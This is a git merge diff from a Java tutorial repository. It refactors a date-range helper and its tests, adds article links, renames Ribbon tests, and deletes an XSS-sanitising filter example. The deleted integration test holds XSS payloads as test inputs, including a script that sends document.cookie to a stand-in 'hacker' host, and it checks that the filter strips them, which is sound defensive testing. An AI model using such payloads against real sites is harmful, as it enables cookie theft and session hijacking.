Merge branch 'eugenp:master' into master
This commit is contained in:
commit
eaba0c1f96
@ -13,12 +13,9 @@ import java.util.stream.IntStream;
|
|||||||
public class TimeApi {
|
public class TimeApi {
|
||||||
|
|
||||||
public static List<Date> getDatesBetweenUsingJava7(Date startDate, Date endDate) {
|
public static List<Date> getDatesBetweenUsingJava7(Date startDate, Date endDate) {
|
||||||
List<Date> datesInRange = new ArrayList<Date>();
|
List<Date> datesInRange = new ArrayList<>();
|
||||||
Calendar calendar = new GregorianCalendar();
|
Calendar calendar = getCalendarWithoutTime(startDate);
|
||||||
calendar.setTime(startDate);
|
Calendar endCalendar = getCalendarWithoutTime(endDate);
|
||||||
|
|
||||||
Calendar endCalendar = new GregorianCalendar();
|
|
||||||
endCalendar.setTime(endDate);
|
|
||||||
|
|
||||||
while (calendar.before(endCalendar)) {
|
while (calendar.before(endCalendar)) {
|
||||||
Date result = calendar.getTime();
|
Date result = calendar.getTime();
|
||||||
@ -40,4 +37,15 @@ public class TimeApi {
|
|||||||
return startDate.datesUntil(endDate).collect(Collectors.toList());
|
return startDate.datesUntil(endDate).collect(Collectors.toList());
|
||||||
}
|
}
|
||||||
|
|
||||||
|
private static Calendar getCalendarWithoutTime(Date date) {
|
||||||
|
Calendar calendar = new GregorianCalendar();
|
||||||
|
calendar.setTime(date);
|
||||||
|
calendar.set(Calendar.HOUR, 0);
|
||||||
|
calendar.set(Calendar.HOUR_OF_DAY, 0);
|
||||||
|
calendar.set(Calendar.MINUTE, 0);
|
||||||
|
calendar.set(Calendar.SECOND, 0);
|
||||||
|
calendar.set(Calendar.MILLISECOND, 0);
|
||||||
|
return calendar;
|
||||||
|
}
|
||||||
|
|
||||||
}
|
}
|
||||||
|
@ -1,12 +1,13 @@
|
|||||||
package com.baeldung.java9.time;
|
package com.baeldung.java9.time;
|
||||||
|
|
||||||
|
import org.junit.Test;
|
||||||
|
|
||||||
import java.time.LocalDate;
|
import java.time.LocalDate;
|
||||||
import java.util.Calendar;
|
import java.util.Calendar;
|
||||||
import java.util.Date;
|
import java.util.Date;
|
||||||
import java.util.List;
|
import java.util.List;
|
||||||
|
|
||||||
import static org.junit.Assert.assertEquals;
|
import static org.assertj.core.api.Assertions.assertThat;
|
||||||
import org.junit.Test;
|
|
||||||
|
|
||||||
public class TimeApiUnitTest {
|
public class TimeApiUnitTest {
|
||||||
|
|
||||||
@ -18,19 +19,18 @@ public class TimeApiUnitTest {
|
|||||||
Date endDate = endCalendar.getTime();
|
Date endDate = endCalendar.getTime();
|
||||||
|
|
||||||
List<Date> dates = TimeApi.getDatesBetweenUsingJava7(startDate, endDate);
|
List<Date> dates = TimeApi.getDatesBetweenUsingJava7(startDate, endDate);
|
||||||
assertEquals(dates.size(), 2);
|
|
||||||
|
assertThat(dates).hasSize(2);
|
||||||
|
|
||||||
Calendar calendar = Calendar.getInstance();
|
Calendar calendar = Calendar.getInstance();
|
||||||
Date date1 = calendar.getTime();
|
Date expectedDate1 = calendar.getTime();
|
||||||
assertEquals(dates.get(0).getDay(), date1.getDay());
|
assertThat(dates.get(0)).isInSameDayAs(expectedDate1);
|
||||||
assertEquals(dates.get(0).getMonth(), date1.getMonth());
|
assertThatTimeFieldsAreZero(dates.get(0));
|
||||||
assertEquals(dates.get(0).getYear(), date1.getYear());
|
|
||||||
|
|
||||||
calendar.add(Calendar.DATE, 1);
|
calendar.add(Calendar.DATE, 1);
|
||||||
Date date2 = calendar.getTime();
|
Date expectedDate2 = calendar.getTime();
|
||||||
assertEquals(dates.get(1).getDay(), date2.getDay());
|
assertThat(dates.get(1)).isInSameDayAs(expectedDate2);
|
||||||
assertEquals(dates.get(1).getMonth(), date2.getMonth());
|
assertThatTimeFieldsAreZero(dates.get(1));
|
||||||
assertEquals(dates.get(1).getYear(), date2.getYear());
|
|
||||||
}
|
}
|
||||||
|
|
||||||
@Test
|
@Test
|
||||||
@ -39,9 +39,8 @@ public class TimeApiUnitTest {
|
|||||||
LocalDate endDate = LocalDate.now().plusDays(2);
|
LocalDate endDate = LocalDate.now().plusDays(2);
|
||||||
|
|
||||||
List<LocalDate> dates = TimeApi.getDatesBetweenUsingJava8(startDate, endDate);
|
List<LocalDate> dates = TimeApi.getDatesBetweenUsingJava8(startDate, endDate);
|
||||||
assertEquals(dates.size(), 2);
|
|
||||||
assertEquals(dates.get(0), LocalDate.now());
|
assertThat(dates).containsExactly(LocalDate.now(), LocalDate.now().plusDays(1));
|
||||||
assertEquals(dates.get(1), LocalDate.now().plusDays(1));
|
|
||||||
}
|
}
|
||||||
|
|
||||||
@Test
|
@Test
|
||||||
@ -50,9 +49,15 @@ public class TimeApiUnitTest {
|
|||||||
LocalDate endDate = LocalDate.now().plusDays(2);
|
LocalDate endDate = LocalDate.now().plusDays(2);
|
||||||
|
|
||||||
List<LocalDate> dates = TimeApi.getDatesBetweenUsingJava9(startDate, endDate);
|
List<LocalDate> dates = TimeApi.getDatesBetweenUsingJava9(startDate, endDate);
|
||||||
assertEquals(dates.size(), 2);
|
|
||||||
assertEquals(dates.get(0), LocalDate.now());
|
assertThat(dates).containsExactly(LocalDate.now(), LocalDate.now().plusDays(1));
|
||||||
assertEquals(dates.get(1), LocalDate.now().plusDays(1));
|
}
|
||||||
|
|
||||||
|
private static void assertThatTimeFieldsAreZero(Date date) {
|
||||||
|
assertThat(date).hasHourOfDay(0);
|
||||||
|
assertThat(date).hasMinute(0);
|
||||||
|
assertThat(date).hasSecond(0);
|
||||||
|
assertThat(date).hasMillisecond(0);
|
||||||
}
|
}
|
||||||
|
|
||||||
}
|
}
|
||||||
|
@ -7,3 +7,4 @@ This module contains article about constructors in Java
|
|||||||
- [Java Copy Constructor](https://www.baeldung.com/java-copy-constructor)
|
- [Java Copy Constructor](https://www.baeldung.com/java-copy-constructor)
|
||||||
- [Cannot Reference “X” Before Supertype Constructor Has Been Called](https://www.baeldung.com/java-cannot-reference-x-before-supertype-constructor-error)
|
- [Cannot Reference “X” Before Supertype Constructor Has Been Called](https://www.baeldung.com/java-cannot-reference-x-before-supertype-constructor-error)
|
||||||
- [Private Constructors in Java](https://www.baeldung.com/java-private-constructors)
|
- [Private Constructors in Java](https://www.baeldung.com/java-private-constructors)
|
||||||
|
- [Throwing Exceptions in Constructors](https://www.baeldung.com/java-constructors-exceptions)
|
||||||
|
@ -4,3 +4,4 @@
|
|||||||
- [Java (String) or .toString()?](https://www.baeldung.com/java-string-casting-vs-tostring)
|
- [Java (String) or .toString()?](https://www.baeldung.com/java-string-casting-vs-tostring)
|
||||||
- [Split Java String by Newline](https://www.baeldung.com/java-string-split-by-newline)
|
- [Split Java String by Newline](https://www.baeldung.com/java-string-split-by-newline)
|
||||||
- [Split a String in Java and Keep the Delimiters](https://www.baeldung.com/java-split-string-keep-delimiters)
|
- [Split a String in Java and Keep the Delimiters](https://www.baeldung.com/java-split-string-keep-delimiters)
|
||||||
|
- [Validate String as Filename in Java](https://www.baeldung.com/java-validate-filename)
|
||||||
|
@ -4,3 +4,5 @@
|
|||||||
|
|
||||||
|
|
||||||
### Relevant Articles:
|
### Relevant Articles:
|
||||||
|
|
||||||
|
- [Spring Data with ArangoDB](https://www.baeldung.com/spring-data-arangodb)
|
||||||
|
@ -14,7 +14,7 @@ import org.springframework.http.ResponseEntity;
|
|||||||
import static org.junit.jupiter.api.Assertions.assertTrue;
|
import static org.junit.jupiter.api.Assertions.assertTrue;
|
||||||
|
|
||||||
@SpringBootTest(webEnvironment = SpringBootTest.WebEnvironment.RANDOM_PORT, classes = RibbonClientApp.class)
|
@SpringBootTest(webEnvironment = SpringBootTest.WebEnvironment.RANDOM_PORT, classes = RibbonClientApp.class)
|
||||||
public class RibbonRetryFailureIntegrationTest {
|
public class RibbonRetryFailureManualTest {
|
||||||
|
|
||||||
private static ConfigurableApplicationContext weatherServiceInstance1;
|
private static ConfigurableApplicationContext weatherServiceInstance1;
|
||||||
private static ConfigurableApplicationContext weatherServiceInstance2;
|
private static ConfigurableApplicationContext weatherServiceInstance2;
|
@ -15,7 +15,7 @@ import static org.junit.jupiter.api.Assertions.assertEquals;
|
|||||||
import static org.junit.jupiter.api.Assertions.assertTrue;
|
import static org.junit.jupiter.api.Assertions.assertTrue;
|
||||||
|
|
||||||
@SpringBootTest(webEnvironment = SpringBootTest.WebEnvironment.RANDOM_PORT, classes = RibbonClientApp.class)
|
@SpringBootTest(webEnvironment = SpringBootTest.WebEnvironment.RANDOM_PORT, classes = RibbonClientApp.class)
|
||||||
public class RibbonRetrySuccessIntegrationTest {
|
public class RibbonRetrySuccessManualTest {
|
||||||
|
|
||||||
private static ConfigurableApplicationContext weatherServiceInstance1;
|
private static ConfigurableApplicationContext weatherServiceInstance1;
|
||||||
private static ConfigurableApplicationContext weatherServiceInstance2;
|
private static ConfigurableApplicationContext weatherServiceInstance2;
|
@ -1,36 +0,0 @@
|
|||||||
package com.baeldung.xss;
|
|
||||||
|
|
||||||
public class Person {
|
|
||||||
private String firstName;
|
|
||||||
private String lastName;
|
|
||||||
private int age;
|
|
||||||
|
|
||||||
public String getFirstName() {
|
|
||||||
return firstName;
|
|
||||||
}
|
|
||||||
|
|
||||||
public void setFirstName(String firstName) {
|
|
||||||
this.firstName = firstName;
|
|
||||||
}
|
|
||||||
|
|
||||||
public String getLastName() {
|
|
||||||
return lastName;
|
|
||||||
}
|
|
||||||
|
|
||||||
public void setLastName(String lastName) {
|
|
||||||
this.lastName = lastName;
|
|
||||||
}
|
|
||||||
|
|
||||||
public int getAge() {
|
|
||||||
return age;
|
|
||||||
}
|
|
||||||
|
|
||||||
public void setAge(int age) {
|
|
||||||
this.age = age;
|
|
||||||
}
|
|
||||||
|
|
||||||
@Override
|
|
||||||
public String toString() {
|
|
||||||
return "Person {" + "firstName='" + firstName + '\'' + ", lastName='" + lastName + '\'' + ", age=" + age + '}';
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,31 +0,0 @@
|
|||||||
package com.baeldung.xss;
|
|
||||||
|
|
||||||
import com.fasterxml.jackson.databind.node.JsonNodeFactory;
|
|
||||||
import com.fasterxml.jackson.databind.node.ObjectNode;
|
|
||||||
import org.springframework.http.HttpStatus;
|
|
||||||
import org.springframework.http.ResponseEntity;
|
|
||||||
import org.springframework.web.bind.annotation.PostMapping;
|
|
||||||
import org.springframework.web.bind.annotation.RequestHeader;
|
|
||||||
import org.springframework.web.bind.annotation.RequestMapping;
|
|
||||||
import org.springframework.web.bind.annotation.RestController;
|
|
||||||
import org.springframework.web.bind.annotation.RequestParam;
|
|
||||||
import org.springframework.web.bind.annotation.RequestBody;
|
|
||||||
|
|
||||||
import java.util.Map;
|
|
||||||
|
|
||||||
@RestController
|
|
||||||
@RequestMapping("/personService")
|
|
||||||
public class PersonController {
|
|
||||||
|
|
||||||
@PostMapping(value = "/person")
|
|
||||||
private ResponseEntity<String> savePerson(@RequestHeader Map<String, String> headers,
|
|
||||||
@RequestParam String param, @RequestBody Person body) {
|
|
||||||
ObjectNode response = JsonNodeFactory.instance.objectNode();
|
|
||||||
headers.forEach((key, value) -> response.put(key, value));
|
|
||||||
response.put("firstName", body.getFirstName());
|
|
||||||
response.put("lastName", body.getLastName());
|
|
||||||
response.put("age", body.getAge());
|
|
||||||
response.put("param", param);
|
|
||||||
return new ResponseEntity<String>(response.toString(), HttpStatus.OK);
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,44 +0,0 @@
|
|||||||
package com.baeldung.xss;
|
|
||||||
|
|
||||||
import org.apache.commons.io.IOUtils;
|
|
||||||
import org.apache.commons.lang.StringUtils;
|
|
||||||
import org.springframework.core.Ordered;
|
|
||||||
import org.springframework.core.annotation.Order;
|
|
||||||
import org.springframework.stereotype.Component;
|
|
||||||
import javax.servlet.Filter;
|
|
||||||
import javax.servlet.FilterConfig;
|
|
||||||
import javax.servlet.ServletRequest;
|
|
||||||
import javax.servlet.ServletResponse;
|
|
||||||
import javax.servlet.ServletException;
|
|
||||||
import javax.servlet.FilterChain;
|
|
||||||
import javax.servlet.http.HttpServletRequest;
|
|
||||||
import java.io.IOException;
|
|
||||||
|
|
||||||
@Component
|
|
||||||
@Order(Ordered.HIGHEST_PRECEDENCE)
|
|
||||||
public class XSSFilter implements Filter {
|
|
||||||
|
|
||||||
@Override
|
|
||||||
public void init(FilterConfig filterConfig) {
|
|
||||||
}
|
|
||||||
|
|
||||||
@Override
|
|
||||||
public void destroy() {
|
|
||||||
}
|
|
||||||
|
|
||||||
@Override
|
|
||||||
public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
|
|
||||||
throws IOException, ServletException {
|
|
||||||
|
|
||||||
XSSRequestWrapper wrappedRequest = new XSSRequestWrapper((HttpServletRequest) request);
|
|
||||||
|
|
||||||
String body = IOUtils.toString(wrappedRequest.getReader());
|
|
||||||
if (!StringUtils.isBlank(body)) {
|
|
||||||
body = XSSUtils.stripXSS(body);
|
|
||||||
wrappedRequest.resetInputStream(body.getBytes());
|
|
||||||
}
|
|
||||||
|
|
||||||
chain.doFilter(wrappedRequest, response);
|
|
||||||
}
|
|
||||||
|
|
||||||
}
|
|
@ -1,123 +0,0 @@
|
|||||||
package com.baeldung.xss;
|
|
||||||
|
|
||||||
import org.apache.commons.codec.Charsets;
|
|
||||||
import org.apache.commons.io.IOUtils;
|
|
||||||
import javax.servlet.ReadListener;
|
|
||||||
import javax.servlet.ServletInputStream;
|
|
||||||
import javax.servlet.http.HttpServletRequest;
|
|
||||||
import javax.servlet.http.HttpServletRequestWrapper;
|
|
||||||
|
|
||||||
import java.io.ByteArrayInputStream;
|
|
||||||
import java.io.IOException;
|
|
||||||
import java.io.BufferedReader;
|
|
||||||
import java.io.InputStreamReader;
|
|
||||||
import java.io.InputStream;
|
|
||||||
import java.util.ArrayList;
|
|
||||||
import java.util.Collections;
|
|
||||||
import java.util.Enumeration;
|
|
||||||
import java.util.List;
|
|
||||||
|
|
||||||
import static com.baeldung.xss.XSSUtils.stripXSS;
|
|
||||||
|
|
||||||
|
|
||||||
public class XSSRequestWrapper extends HttpServletRequestWrapper {
|
|
||||||
|
|
||||||
private byte[] rawData;
|
|
||||||
private HttpServletRequest request;
|
|
||||||
private ResettableServletInputStream servletStream;
|
|
||||||
|
|
||||||
public XSSRequestWrapper(HttpServletRequest request) {
|
|
||||||
super(request);
|
|
||||||
this.request = request;
|
|
||||||
this.servletStream = new ResettableServletInputStream();
|
|
||||||
}
|
|
||||||
|
|
||||||
public void resetInputStream(byte[] newRawData) {
|
|
||||||
rawData = newRawData;
|
|
||||||
servletStream.stream = new ByteArrayInputStream(newRawData);
|
|
||||||
}
|
|
||||||
|
|
||||||
@Override
|
|
||||||
public ServletInputStream getInputStream() throws IOException {
|
|
||||||
if (rawData == null) {
|
|
||||||
rawData = IOUtils.toByteArray(this.request.getReader(), Charsets.UTF_8);
|
|
||||||
servletStream.stream = new ByteArrayInputStream(rawData);
|
|
||||||
}
|
|
||||||
return servletStream;
|
|
||||||
}
|
|
||||||
|
|
||||||
@Override
|
|
||||||
public BufferedReader getReader() throws IOException {
|
|
||||||
if (rawData == null) {
|
|
||||||
rawData = IOUtils.toByteArray(this.request.getReader(), Charsets.UTF_8);
|
|
||||||
servletStream.stream = new ByteArrayInputStream(rawData);
|
|
||||||
}
|
|
||||||
return new BufferedReader(new InputStreamReader(servletStream));
|
|
||||||
}
|
|
||||||
|
|
||||||
private class ResettableServletInputStream extends ServletInputStream {
|
|
||||||
|
|
||||||
private InputStream stream;
|
|
||||||
|
|
||||||
@Override
|
|
||||||
public int read() throws IOException {
|
|
||||||
return stream.read();
|
|
||||||
}
|
|
||||||
|
|
||||||
@Override
|
|
||||||
public boolean isFinished() {
|
|
||||||
return false;
|
|
||||||
}
|
|
||||||
|
|
||||||
@Override
|
|
||||||
public boolean isReady() {
|
|
||||||
return false;
|
|
||||||
}
|
|
||||||
|
|
||||||
@Override
|
|
||||||
public void setReadListener(ReadListener readListener) {
|
|
||||||
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
@Override
|
|
||||||
public String[] getParameterValues(String parameter) {
|
|
||||||
String[] values = super.getParameterValues(parameter);
|
|
||||||
if (values == null) {
|
|
||||||
return null;
|
|
||||||
}
|
|
||||||
int count = values.length;
|
|
||||||
String[] encodedValues = new String[count];
|
|
||||||
for (int i = 0; i < count; i++) {
|
|
||||||
encodedValues[i] = stripXSS(values[i]);
|
|
||||||
}
|
|
||||||
return encodedValues;
|
|
||||||
}
|
|
||||||
|
|
||||||
@Override
|
|
||||||
public String getParameter(String parameter) {
|
|
||||||
String value = super.getParameter(parameter);
|
|
||||||
return stripXSS(value);
|
|
||||||
}
|
|
||||||
|
|
||||||
@Override
|
|
||||||
public String getHeader(String name) {
|
|
||||||
String value = super.getHeader(name);
|
|
||||||
return stripXSS(value);
|
|
||||||
}
|
|
||||||
|
|
||||||
@Override
|
|
||||||
public Enumeration<String> getHeaders(String name) {
|
|
||||||
List<String> result = new ArrayList<>();
|
|
||||||
Enumeration<String> headers = super.getHeaders(name);
|
|
||||||
while (headers.hasMoreElements()) {
|
|
||||||
String header = headers.nextElement();
|
|
||||||
String[] tokens = header.split(",");
|
|
||||||
for (String token : tokens) {
|
|
||||||
result.add(stripXSS(token));
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return Collections.enumeration(result);
|
|
||||||
}
|
|
||||||
|
|
||||||
}
|
|
@ -1,19 +0,0 @@
|
|||||||
package com.baeldung.xss;
|
|
||||||
|
|
||||||
import org.jsoup.Jsoup;
|
|
||||||
import org.jsoup.safety.Whitelist;
|
|
||||||
import org.owasp.esapi.ESAPI;
|
|
||||||
|
|
||||||
public class XSSUtils {
|
|
||||||
|
|
||||||
public static String stripXSS(String value) {
|
|
||||||
if (value == null) {
|
|
||||||
return null;
|
|
||||||
}
|
|
||||||
value = ESAPI.encoder()
|
|
||||||
.canonicalize(value)
|
|
||||||
.replaceAll("\0", "");
|
|
||||||
return Jsoup.clean(value, Whitelist.none());
|
|
||||||
}
|
|
||||||
|
|
||||||
}
|
|
@ -1,64 +0,0 @@
|
|||||||
package com.baeldung.xss;
|
|
||||||
|
|
||||||
import com.fasterxml.jackson.databind.JsonNode;
|
|
||||||
import com.fasterxml.jackson.databind.ObjectMapper;
|
|
||||||
import com.fasterxml.jackson.databind.node.JsonNodeFactory;
|
|
||||||
import com.fasterxml.jackson.databind.node.ObjectNode;
|
|
||||||
import org.junit.jupiter.api.Test;
|
|
||||||
import org.springframework.boot.test.context.SpringBootTest;
|
|
||||||
import org.springframework.boot.web.server.LocalServerPort;
|
|
||||||
import org.springframework.http.*;
|
|
||||||
import org.springframework.web.client.RestTemplate;
|
|
||||||
import org.springframework.web.util.UriComponentsBuilder;
|
|
||||||
import java.io.IOException;
|
|
||||||
import static org.assertj.core.api.Assertions.assertThat;
|
|
||||||
|
|
||||||
@SpringBootTest(webEnvironment = SpringBootTest.WebEnvironment.RANDOM_PORT)
|
|
||||||
class PersonControllerIntegrationTest {
|
|
||||||
|
|
||||||
@LocalServerPort
|
|
||||||
int randomServerPort;
|
|
||||||
|
|
||||||
@Test
|
|
||||||
public void givenRequestIsSuspicious_whenRequestIsPost_thenResponseIsClean()
|
|
||||||
throws IOException {
|
|
||||||
// given
|
|
||||||
String createPersonUrl;
|
|
||||||
RestTemplate restTemplate;
|
|
||||||
HttpHeaders headers;
|
|
||||||
UriComponentsBuilder builder;
|
|
||||||
ObjectMapper objectMapper = new ObjectMapper();
|
|
||||||
ObjectNode personJsonObject = JsonNodeFactory.instance.objectNode();
|
|
||||||
createPersonUrl = "http://localhost:" + randomServerPort + "/personService/person";
|
|
||||||
restTemplate = new RestTemplate();
|
|
||||||
headers = new HttpHeaders();
|
|
||||||
|
|
||||||
// when
|
|
||||||
personJsonObject.put("id", 1);
|
|
||||||
personJsonObject.put("firstName", "baeldung <script>alert('XSS')</script>");
|
|
||||||
personJsonObject.put("lastName", "baeldung <b onmouseover=alert('XSS')>click me!</b>");
|
|
||||||
|
|
||||||
builder = UriComponentsBuilder.fromHttpUrl(createPersonUrl)
|
|
||||||
.queryParam("param", "<script>");
|
|
||||||
|
|
||||||
headers.setContentType(MediaType.APPLICATION_JSON);
|
|
||||||
headers.add("header_1", "<body onload=alert('XSS')>");
|
|
||||||
headers.add("header_2", "<span onmousemove='doBadXss()'>");
|
|
||||||
headers.add("header_3", "<SCRIPT>var+img=new+Image();img.src=\"http://hacker/\"%20+%20document.cookie;</SCRIPT>");
|
|
||||||
headers.add("header_4", "<p>Your search for 'flowers <script>evil_script()</script>'");
|
|
||||||
HttpEntity<String> request = new HttpEntity<>(personJsonObject.toString(), headers);
|
|
||||||
|
|
||||||
ResponseEntity<String> personResultAsJsonStr = restTemplate.exchange(builder.toUriString(),
|
|
||||||
HttpMethod.POST, request, String.class);
|
|
||||||
JsonNode root = objectMapper.readTree(personResultAsJsonStr.getBody());
|
|
||||||
|
|
||||||
// then
|
|
||||||
assertThat(root.get("firstName").textValue()).isEqualTo("baeldung ");
|
|
||||||
assertThat(root.get("lastName").textValue()).isEqualTo("baeldung click me!");
|
|
||||||
assertThat(root.get("param").textValue()).isEmpty();
|
|
||||||
assertThat(root.get("header_1").textValue()).isEmpty();
|
|
||||||
assertThat(root.get("header_2").textValue()).isEmpty();
|
|
||||||
assertThat(root.get("header_3").textValue()).isEmpty();
|
|
||||||
assertThat(root.get("header_4").textValue()).isEqualTo("Your search for 'flowers '");
|
|
||||||
}
|
|
||||||
}
|
|
@ -10,6 +10,7 @@ This module contains articles about core Spring Security
|
|||||||
- [Deny Access on Missing @PreAuthorize to Spring Controller Methods](https://www.baeldung.com/spring-deny-access)
|
- [Deny Access on Missing @PreAuthorize to Spring Controller Methods](https://www.baeldung.com/spring-deny-access)
|
||||||
- [Spring Security: Check If a User Has a Role in Java](https://www.baeldung.com/spring-security-check-user-role)
|
- [Spring Security: Check If a User Has a Role in Java](https://www.baeldung.com/spring-security-check-user-role)
|
||||||
- [Filtering Jackson JSON Output Based on Spring Security Role](https://www.baeldung.com/spring-security-role-filter-json)
|
- [Filtering Jackson JSON Output Based on Spring Security Role](https://www.baeldung.com/spring-security-role-filter-json)
|
||||||
|
- [Spring @EnableWebSecurity vs. @EnableGlobalMethodSecurity](https://www.baeldung.com/spring-enablewebsecurity-vs-enableglobalmethodsecurity)
|
||||||
|
|
||||||
### Build the Project
|
### Build the Project
|
||||||
|
|
||||||
|
Loading…
x
Reference in New Issue
Block a user